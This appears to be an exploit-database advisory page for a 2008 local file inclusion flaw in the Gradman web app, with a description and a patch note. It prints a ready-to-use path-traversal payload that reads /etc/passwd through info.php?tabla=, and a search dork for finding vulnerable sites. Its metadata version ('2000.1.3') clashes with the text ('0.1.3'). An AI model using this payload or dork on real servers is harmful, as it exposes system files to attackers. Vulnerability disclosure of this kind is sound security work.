header-logo
Suggest Exploit
vendor:
Gradman
by:
Syndr0me!
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Gradman
Affected Version From: 2000.1.3
Affected Version To: 2000.1.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:gradman:gradman
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Local File Inclusion [High]

Gradman <= 0.1.3 is vulnerable to a Local File Inclusion vulnerability. This vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable server. By exploiting this vulnerability, an attacker can gain access to sensitive information such as the /etc/passwd file. The vulnerable parameter is the 'tabla' parameter in the 'info.php' script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Gradman.
Source

Exploit-DB raw data:

Software: Gradman <= 0.1.3
HomePage: http://gradman.xe1ido.com.mx/
Software: Gradman <= 0.1.3
Exploit:  Local File Inclusion [High]
Dork:    "powered by Gradman"
Bug Found By: Syndr0me! site: www.remoteexecution.es
Where: info.php?tabla=
Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r
[+] Exploit:
info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-01-18]

Navigation

Suggest Exploit

Services By CQR